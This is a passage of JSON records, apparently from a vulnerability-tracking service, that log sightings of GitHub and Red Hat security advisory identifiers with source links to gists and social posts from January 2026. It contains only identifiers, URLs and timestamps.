"GHSA-5h86-8mv2-jq9f", "type": "seen", "source": "https://gist.github.com/konard/2ab7f7aec831dac7fe234e8446d13f57", "content": "", "creation_timestamp": "2026-01-19T23:16:44.000000Z"}, {"uuid": "a8664c2f-406b-49a7-bc6b-ab18e68ae8b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54jq-c3m8-4m76", "type": "seen", "source": "https://gist.github.com/konard/2ab7f7aec831dac7fe234e8446d13f57", "content": "", "creation_timestamp": "2026-01-19T23:16:44.000000Z"}, {"uuid": "dcca2767-198f-4913-925d-7826b359244c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gfw2-4jvh-wgfg", "type": "seen", "source": "https://gist.github.com/konard/0d69c914be52c3cee3437d4858b1c259", "content": "", "creation_timestamp": "2026-01-19T23:20:05.000000Z"}, {"uuid": "cb756e86-4f03-4a65-bded-f338e0a42c4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xx9p-xxvh-7g8j", "type": "seen", "source": "https://gist.github.com/konard/0d69c914be52c3cee3437d4858b1c259", "content": "", "creation_timestamp": "2026-01-19T23:20:05.000000Z"}, {"uuid": "4e3fc957-9716-40b9-ae6e-c29a9ca8470b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5h86-8mv2-jq9f", "type": "seen", "source": "https://gist.github.com/konard/3de926e0381015c1d03f701f6ead1cf4", "content": "", "creation_timestamp": "2026-01-19T23:19:21.000000Z"}, {"uuid": "d7394c16-9ce4-48d4-beec-9054c9a187bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54jq-c3m8-4m76", "type": "seen", "source": "https://gist.github.com/konard/3de926e0381015c1d03f701f6ead1cf4", "content": "", "creation_timestamp": "2026-01-19T23:19:21.000000Z"}, {"uuid": "9a4d8391-7c31-431f-bc20-cba4c4c3cfb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5h86-8mv2-jq9f", "type": "seen", "source": "https://gist.github.com/konard/af34f7028e9587a38f0f44025c8a3907", "content": "", "creation_timestamp": "2026-01-19T23:19:13.000000Z"}, {"uuid": "08dedbba-5192-4e36-aec6-cf041c517492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54jq-c3m8-4m76", "type": "seen", "source": "https://gist.github.com/konard/af34f7028e9587a38f0f44025c8a3907", "content": "", "creation_timestamp": "2026-01-19T23:19:13.000000Z"}, {"uuid": "1e0661c6-ce68-460f-97d0-8c25d81a3529", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xxxx-xxxx-xxxx", "type": "seen", "source": "https://gist.github.com/christiankopac/0797838ab2b306060a09390db0528458", "content": "", "creation_timestamp": "2026-01-20T10:25:51.000000Z"}, {"uuid": "5ad426cc-08cd-4c8d-8897-df681d5ed5ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0836", "type": "seen", "source": "https://gist.github.com/Darkcrai86/67af930231afae12d91747bf6f77005f", "content": "", "creation_timestamp": "2026-01-20T10:31:08.000000Z"}, {"uuid": "f33cec95-3bb9-42a2-a2b7-972399b8ff58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0868", "type": "seen", "source": "https://gist.github.com/Darkcrai86/45f7e1933c5b49a4feeda0fba1eccde2", "content": "", "creation_timestamp": "2026-01-20T15:52:55.000000Z"}, {"uuid": "22dcc1f4-0c11-4e0e-8f42-6bbfe7241872", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0867", "type": "seen", "source": "https://gist.github.com/Darkcrai86/5687a6a36591aba43b61ab356312a627", "content": "", "creation_timestamp": "2026-01-20T15:52:30.000000Z"}, {"uuid": "940c8fae-304d-440e-aa82-21d4c974020e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0845", "type": "seen", "source": "https://gist.github.com/Darkcrai86/afd5f9a8a7b226de28e1890e2e1f83b3", "content": "", "creation_timestamp": "2026-01-20T15:54:17.000000Z"}, {"uuid": "5f89d7e3-7a22-4ff0-9bb0-6ca2a7835bab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gg8q-rcg7-p79g", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3mcuozhca6zm2", "content": "", "creation_timestamp": "2026-01-20T17:39:58.145640Z"}, {"uuid": "3a1bba69-e2ef-4e17-8fcf-f09ac991e2c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5h2f-wg8j-xqwp", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3mcuozhca6zm2", "content": "", "creation_timestamp": "2026-01-20T17:39:58.230502Z"}, {"uuid": "7bc2eee1-9d43-4d98-b4e1-e61cbc5ca6fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6x3w-9g92-gvf3", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3mcuozhca6zm2", "content": "", "creation_timestamp": "2026-01-20T17:39:58.318994Z"}, {"uuid": "4755466b-8d64-464a-9c77-4441508001d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jm76-5g2j-p4hp", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115929850738126657", "content": "", "creation_timestamp": "2026-01-20T22:45:40.446706Z"}, {"uuid": "622b2f0b-b095-4ce0-ab2f-1bd9941d92d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0907", "type": "seen", "source": "https://gist.github.com/Darkcrai86/f5802e070338f82ded5490674eb75562", "content": "", "creation_timestamp": "2026-01-21T07:52:32.000000Z"}, {"uuid": "80a57e76-7690-4039-977f-4a6b45b0b071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0905", "type": "seen", "source": "https://gist.github.com/Darkcrai86/255298d5dcfb1953fdea37366b890c55", "content": "", "creation_timestamp": "2026-01-21T07:52:54.000000Z"}, {"uuid": "4dfa76c7-59fd-4f07-b4be-ee07a1dee699", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0906", "type": "seen", "source": "https://gist.github.com/Darkcrai86/d22625358278aa9543ecc488050096ec", "content": "", "creation_timestamp": "2026-01-21T07:53:18.000000Z"}, {"uuid": "c1288707-f392-4ef6-8fae-05f11e5d3664", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m3h4-65j5-6j8c", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115980353620259404", "content": "", "creation_timestamp": "2026-01-29T20:49:13.428685Z"}, {"uuid": "c99c7abc-2fe4-4d1d-8511-a8f10210417a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5p3-f4cq-94v5", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115980456736557020", "content": "", "creation_timestamp": "2026-01-29T21:15:25.903908Z"}, {"uuid": "2ae6d043-5054-4aa4-9d30-ee9f4c5b5517", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vx6x-6559-x35r", "type": "seen", "source": "https://gist.github.com/alon710/1f0c6ce8ba60cfb0f8654497361725d4", "content": "", "creation_timestamp": "2026-01-30T03:50:50.000000Z"}, {"uuid": "90541e99-1272-4ca0-873d-81d79febb6ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j477-6vpg-6c8x", "type": "seen", "source": "https://gist.github.com/alon710/e49bd8e494bc74785456a45ff96b4d99", "content": "", "creation_timestamp": "2026-01-29T15:40:51.000000Z"}, {"uuid": "7b1ba84f-8db4-41d6-b409-9c5f030193c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v364-rw7m-3263", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mbsmwd4sij2y", "content": "", "creation_timestamp": "2026-01-07T04:28:17.207337Z"}, {"uuid": "09976062-0110-4ca0-8236-f2de820953a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0171", "type": "seen", "source": "https://gist.github.com/Darkcrai86/92bb3c0113cab722d30ccbb367ae344e", "content": "", "creation_timestamp": "2026-01-07T07:58:50.000000Z"}, {"uuid": "bb1e27de-ee76-44ad-be64-6dcc28e7afc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0204", "type": "seen", "source": "https://gist.github.com/Darkcrai86/cee42ce27967d7ab866daad2eb6a5824", "content": "", "creation_timestamp": "2026-01-07T07:58:07.000000Z"}, {"uuid": "c0e13822-3d98-4e12-9202-a3d443b7fb52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0140", "type": "seen", "source": "https://gist.github.com/Darkcrai86/e324d6ee752dbf6eb468d5f19062efc3", "content": "", "creation_timestamp": "2026-01-07T07:59:31.000000Z"}, {"uuid": "2287e644-4c49-46de-bb55-bba175a2c81b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0141", "type": "seen", "source": "https://gist.github.com/Darkcrai86/cc48b46607e317dd2c0f3a6f0c863e49", "content": "", "creation_timestamp": "2026-01-07T07:59:11.000000Z"}, {"uuid": "b1371aa2-e334-475d-9380-85bb79539914", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0137", "type": "seen", "source": "https://gist.github.com/Darkcrai86/198e3bbbcd10f19fb5cc8fd21ff0bd86", "content": "", "creation_timestamp": "2026-01-07T08:00:32.000000Z"}, {"uuid": "905fddee-435f-464a-adc6-5c23176de7d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0139", "type": "seen", "source": "https://gist.github.com/Darkcrai86/8c147fe7398f0a30d342a66ef46b64f2", "content": "", "creation_timestamp": "2026-01-07T08:00:04.000000Z"}, {"uuid": "c771589d-508a-40cc-8a62-cfb52ba84628", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0136", "type": "seen", "source": "https://gist.github.com/Darkcrai86/337f1b4b756bb75dc92f17a952b1d645", "content": "", "creation_timestamp": "2026-01-07T08:01:02.000000Z"}, {"uuid": "ebb8abe3-97ee-4a78-a454-fd5f2eaca767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0127", "type": "seen", "source": "https://gist.github.com/Darkcrai86/283f41cc10fb5e82560bd250348bae4a", "content": "", "creation_timestamp": "2026-01-07T08:02:27.000000Z"}, {"uuid": "c9926e33-da92-4b95-9f59-06d2b53cb2a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0124", "type": "seen", "source": "https://gist.github.com/Darkcrai86/e02da37de22c9920c15a04bf7fdd013c", "content": "", "creation_timestamp": "2026-01-07T08:01:46.000000Z"}, {"uuid": "d0cbbea3-1355-4487-b5de-96b1fe6c1945", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0125", "type": "seen", "source": "https://gist.github.com/Darkcrai86/8edcccaaa065a046b182540d16561ad0", "content": "", "creation_timestamp": "2026-01-07T08:03:00.000000Z"}, {"uuid": "50f5ce18-f252-42e3-9211-d9404082bdc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0112", "type": "seen", "source": "https://gist.github.com/Darkcrai86/eb00f02e3c8fed17c7506cbdd1a5deeb", "content": "", "creation_timestamp": "2026-01-07T08:04:04.000000Z"}, {"uuid": "37066b07-5cb2-4fa3-941a-11cafd0d0423", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0111", "type": "seen", "source": "https://gist.github.com/Darkcrai86/152b7e74ab0b21e2561b98f648c6a0c6", "content": "", "creation_timestamp": "2026-01-07T08:03:38.000000Z"}, {"uuid": "af49e6b2-5285-4c47-8115-a1e2fbb1e843", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0090", "type": "seen", "source": "https://gist.github.com/Darkcrai86/42831a1f41417df3b055adbab542fe7b", "content": "", "creation_timestamp": "2026-01-07T08:05:05.000000Z"}, {"uuid": "e232e18e-ecca-429f-a23d-30a14bb74fca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0094", "type": "seen", "source": "https://gist.github.com/Darkcrai86/4b858c1057befd066dd851a635e9515f", "content": "", "creation_timestamp": "2026-01-07T08:04:43.000000Z"}, {"uuid": "dda57dfa-bbb6-416f-9a25-2c29f68c4dd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0095", "type": "seen", "source": "https://gist.github.com/Darkcrai86/cbeb5c189fe595c1c1d9fc7940ab1523", "content": "", "creation_timestamp": "2026-01-07T08:05:53.000000Z"}, {"uuid": "e0c2bfa9-4033-40fb-9f7f-cc4307e12c7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0093", "type": "seen", "source": "https://gist.github.com/Darkcrai86/e6f190a2b62c81fa77b934e5d5cc72e1", "content": "", "creation_timestamp": "2026-01-07T08:05:28.000000Z"}, {"uuid": "be7b3310-65e8-43bd-85d1-f9bc9d5e8707", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0075", "type": "seen", "source": "https://gist.github.com/Darkcrai86/3f96f1ac572551824b9862220d590d09", "content": "", "creation_timestamp": "2026-01-07T08:06:44.000000Z"}, {"uuid": "5102d375-4802-44e6-9c76-9c0e3a7b4b02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0092", "type": "seen", "source": "https://gist.github.com/Darkcrai86/ee14383c6c90284b1fd370dfddb9fc8f", "content": "", "creation_timestamp": "2026-01-07T08:06:13.000000Z"}, {"uuid": "059533b9-d08f-41fa-98e3-c8f4ba88808f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0061", "type": "seen", "source": "https://gist.github.com/Darkcrai86/71aa6c4cbb96a5f964b52a123cf11436", "content": "", "creation_timestamp": "2026-01-07T08:07:59.000000Z"}, {"uuid": "fbdd458e-9928-4ebe-9337-426cd6ae03d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0074", "type": "seen", "source": "https://gist.github.com/Darkcrai86/68c063b61124676f24152a465f2a20ca", "content": "", "creation_timestamp": "2026-01-07T08:07:26.000000Z"}, {"uuid": "9763209a-24de-4447-ae3c-51f7d252f4a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88q6-jcjg-hvmw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115866869324784128", "content": "", "creation_timestamp": "2026-01-09T19:48:39.346112Z"}, {"uuid": "56abcb86-d7ca-429b-9bcf-b3b9a867a9a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78h3-63c4-5fqc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115866871923004166", "content": "", "creation_timestamp": "2026-01-09T19:49:18.591144Z"}, {"uuid": "a3254681-1054-47e8-9ec2-08bdb327d5f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4389-rwqf-q9gq", "type": "seen", "source": "https://seclists.org/oss-sec/2026/q1/47", "content": "", "creation_timestamp": "2026-01-09T19:17:10.000000Z"}, {"uuid": "207de7dd-f9e4-499b-b395-f7f6bebc2113", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4pr-fm98-w9pg", "type": "seen", "source": "https://infosec.exchange/users/shadowserver/statuses/115872638092112061", "content": "", "creation_timestamp": "2026-01-10T20:15:45.976555Z"}, {"uuid": "bcc1bf3c-82cd-4c88-bfbc-2127d8790334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xvjr-f2r9-c7ww", "type": "seen", "source": "https://seclists.org/oss-sec/2026/q1/49", "content": "", "creation_timestamp": "2026-01-11T00:56:46.000000Z"}, {"uuid": "85d812d4-202e-482c-ae65-ed63fd70f62b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67mh-4wv8-2f99", "type": "seen", "source": "https://gist.github.com/m-cahill/9819ecd74ebfd9b0296ef0854e879296", "content": "", "creation_timestamp": "2026-01-11T22:08:26.000000Z"}, {"uuid": "9da24d11-5cbf-453d-82ed-ab6e3a87bb4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mwr6-3gp8-9jmj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115889422613770777", "content": "", "creation_timestamp": "2026-01-13T19:24:15.643405Z"}, {"uuid": "3c71e688-7906-4c52-8c54-cb3413c2dbd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ffj4-jq7m-9g6v", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115889836069615909", "content": "", "creation_timestamp": "2026-01-13T21:09:23.709311Z"}, {"uuid": "b7e7bbe0-c593-480b-a375-75e9077d7d9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xg9w-vg3g-6m68", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115889836069615909", "content": "", "creation_timestamp": "2026-01-13T21:09:23.877484Z"}, {"uuid": "05600e23-3355-4358-b019-2422f29f958a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7hg4-x4pr-3hrg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115890173342129291", "content": "", "creation_timestamp": "2026-01-13T22:35:10.032833Z"}, {"uuid": "a53169d7-c42b-4c8e-a45f-da3144020c5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H856-FFVV-XVR4", "type": "seen", "source": "https://t.me/securixy_kz/959", "content": "", "creation_timestamp": "2026-07-12T22:00:10.524787Z"}, {"uuid": "5aa08aa7-da3e-4a66-b154-2870613944d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67mh-4wv8-2f99", "type": "seen", "source": "https://gist.github.com/konard/f7da40f0658fbb9ebf32527e92f7f727", "content": "", "creation_timestamp": "2026-01-14T04:03:30.000000Z"}, {"uuid": "266ef393-0b6d-4bc0-b987-e8f17a4970e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm45-q3v2-6cf8", "type": "seen", "source": "https://gist.github.com/konard/f7da40f0658fbb9ebf32527e92f7f727", "content": "", "creation_timestamp": "2026-01-14T04:03:30.000000Z"}, {"uuid": "4f71b8b5-6371-414c-81a4-ff156f15ed7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67mh-4wv8-2f99", "type": "seen", "source": "https://gist.github.com/konard/a2ac7b6e880ce655af9b80255ceff0a9", "content": "", "creation_timestamp": "2026-01-14T04:52:09.000000Z"}, {"uuid": "211b9197-290c-4c7e-8492-6a6a4a24bf83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm45-q3v2-6cf8", "type": "seen", "source": "https://gist.github.com/konard/a2ac7b6e880ce655af9b80255ceff0a9", "content": "", "creation_timestamp": "2026-01-14T04:52:09.000000Z"}, {"uuid": "5625fcf8-36f6-48e7-9ca7-af4b812a431c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0535", "type": "seen", "source": "https://gist.github.com/Darkcrai86/8275a63e11fcf7c0a49ad8cb96e9830e", "content": "", "creation_timestamp": "2026-01-14T07:40:12.000000Z"}, {"uuid": "200b4ceb-b7a0-4da6-9438-ae4f81a957de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0532", "type": "seen", "source": "https://gist.github.com/Darkcrai86/1edd7f7f7434b5508846a1b0b7142667", "content": "", "creation_timestamp": "2026-01-14T07:40:56.000000Z"}, {"uuid": "e80bcee4-4f51-44fb-874f-38cd43f7d770", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0536", "type": "seen", "source": "https://gist.github.com/Darkcrai86/ce0e82e314503adc9a99402dd986378e", "content": "", "creation_timestamp": "2026-01-14T07:40:32.000000Z"}, {"uuid": "d6323c55-81c2-4617-a45d-ad2b5353dc54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0533", "type": "seen", "source": "https://gist.github.com/Darkcrai86/25a07d49e1f995bc8a92840f5a415069", "content": "", "creation_timestamp": "2026-01-14T07:41:21.000000Z"}, {"uuid": "6ed1749e-8959-4cea-a2b6-49f4f8b220c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0513", "type": "seen", "source": "https://gist.github.com/Darkcrai86/1ca4a73e35372d68102e855105545c5c", "content": "", "creation_timestamp": "2026-01-14T07:42:28.000000Z"}, {"uuid": "6197aaab-cd51-4fda-972e-64d0b5c0dcd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0489", "type": "seen", "source": "https://gist.github.com/Darkcrai86/dd3896dbf37c80f0e4ff392811b02894", "content": "", "creation_timestamp": "2026-01-14T07:43:21.000000Z"}, {"uuid": "01291ba7-a0ed-4f46-a18e-948a5dbd0063", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24x5-wp64-9fcc", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3mcmndtqqbw2s", "content": "", "creation_timestamp": "2026-01-17T12:45:03.715592Z"}, {"uuid": "52d8c70a-eb9a-45a9-83b6-966b340f8b78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7cq3-mhxq-w946", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3mcmndtqqbw2s", "content": "", "creation_timestamp": "2026-01-17T12:45:03.838190Z"}, {"uuid": "ffb321ea-a242-47b7-9502-95e4828ea101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-28cf-xvcf-hw6m", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3mcmndtqqbw2s", "content": "", "creation_timestamp": "2026-01-17T12:45:03.966109Z"}, {"uuid": "e4a62084-13f3-4e46-96ec-d1a7f75e608b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5882-5RX9-XGXP", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mcntross7xg2", "content": "", "creation_timestamp": "2026-01-18T00:13:00.642934Z"}, {"uuid": "b871a83e-872f-4732-9cd7-a3001a65db27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GW32-9RMW-QWWW", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mco27cghyct2", "content": "", "creation_timestamp": "2026-01-18T02:10:10.488492Z"}, {"uuid": "4966fb0a-48a4-43c0-ab08-8dfd9fc80342", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw8x-6495-233v", 